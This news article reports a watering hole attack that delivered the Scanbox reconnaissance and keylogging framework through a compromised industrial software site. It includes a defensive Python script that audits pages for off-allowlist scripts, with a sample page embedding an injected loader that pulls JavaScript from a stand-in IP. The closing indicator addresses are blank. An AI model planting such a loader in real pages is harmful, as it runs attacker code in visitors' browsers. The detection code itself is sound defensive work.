Industrial software website used in watering hole attack

AlienVault Labs has discovered a watering hole attack that's using a framework developed for reconnaissance as the primary infection vector.

The criminals responsible for the incident compromised an unnamed industrial software firm's website, suggesting the potential for future attacks against several industries.

The unnamed victim produces software used for simulation and system engineering for a wide range of industries, AlienVault said, including automotive, aerospace, and manufacturing.

The attack starts on the compromised firm's website, where a malicious JavaScript file is loaded from a remote server. Unlike most watering hole incidents, where the visitor is infected with malware, this attack delivers a reconnaissance framework called Scanbox, which runs as JavaScript in the visitor's browser rather than dropping an executable on the machine.

Scanbox collects data from the victim and delivers it to the command and control server.

Using plug-ins, the framework can detect dozens of third-party software installations, including browsers, instant messengers, remote access software, business software, and security software. Finally, a keylogging component captures what the visitor types, both periodically and whenever the victim submits information to the compromised website.
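The infection vector described above is a script tag (or script-injecting inline code) that pulls JavaScript from a host the site owner does not control. A site owner can audit their own pages for exactly that. The following is an added example, not code from the article or from AlienVault: it parses a page's HTML, resolves the host each script is fetched from, and flags anything outside an allowlist of first-party hosts, plus inline scripts that build script elements dynamically. The allowlist hosts, the sample page and the 198.51.100.23 address (a documentation range) are constructed for illustration and are not indicators from the incident.

```python
"""Audit a page's <script> tags against an allowlist of first-party hosts.

Added example for the Scanbox watering-hole case. The sample page, the
allowlist and the IP address below are constructed, not taken from the
incident described in the article.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical first-party hosts that are allowed to serve script.
ALLOWED_SCRIPT_HOSTS = {"www.example-sim.test", "cdn.example-sim.test"}

# Inline-script fragments that typically indicate a dynamic script loader.
DYNAMIC_LOADER_MARKERS = (
    'createElement("script")',
    "createElement('script')",
    "document.write(",
)


class ScriptCollector(HTMLParser):
    """Collects every <script src=...> and the body of every inline <script>."""

    def __init__(self):
        super().__init__()
        self.srcs = []            # src attribute of each external script
        self.inline_bodies = []   # text of each inline script
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_script = True
            self.inline_bodies.append("")

    def handle_data(self, data):
        # HTMLParser treats <script> content as raw data, so it arrives here.
        if self._in_script:
            self.inline_bodies[-1] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False


def script_host(src, page_host):
    """Return the host a script src will actually be fetched from."""
    parsed = urlparse(src)
    if parsed.netloc:
        # Absolute (https://host/x.js) or protocol-relative (//host/x.js).
        return parsed.netloc.lower()
    if not parsed.scheme:
        # Relative path: fetched from the page's own origin.
        return page_host
    # data:, javascript: and similar schemes have no host; report the scheme.
    return parsed.scheme + ":"


def audit_scripts(html, page_host, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (kind, detail) findings for off-allowlist and dynamically injected scripts."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()

    findings = []
    for src in collector.srcs:
        if script_host(src, page_host) not in allowed_hosts:
            findings.append(("external-script", src))
    for body in collector.inline_bodies:
        if any(marker in body for marker in DYNAMIC_LOADER_MARKERS):
            findings.append(("dynamic-loader", body.strip()[:80]))
    return findings


# Constructed sample page: two legitimate scripts, one remote loader injected
# by tag, and one injected by inline code.
SAMPLE_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example-sim.test/lib.js"></script>
<script src="//198.51.100.23/js/recon.js"></script>
<script>var s=document.createElement('script');s.src='http://198.51.100.23/x.js';document.body.appendChild(s);</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_scripts(SAMPLE_PAGE, "www.example-sim.test"):
        print(f"{kind}: {detail}")
```

This only inspects the HTML you retrieve; run it against the pages as served to visitors, since an attacker who has write access to the site can inject the loader into templates or served files rather than the source repository. A Content-Security-Policy whose script-src lists only the first-party hosts would additionally stop the browser from fetching a loader like the one flagged here.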

This isn't the first time such techniques have been seen in the wild. AlienVault had already noticed this type of reconnaissance in July, while observing a number of attackers.

"This is a very powerful framework that gives attackers a lot of insight into the potential targets that will help them launch future attacks against them," commented AlienVault's Jaime Blasco.

"We have also seen several Metasploit-produced exploits that target different versions of Java in the same IP address that hosts the Scanbox framework."

For now, AlienVault suggests that administrators watch for traffic from and, as those are indicators of this attack in action.

The IP address that is hosting the command and control server is; it's assigned to a data center in Hong Kong.

Stories by Steve Ragan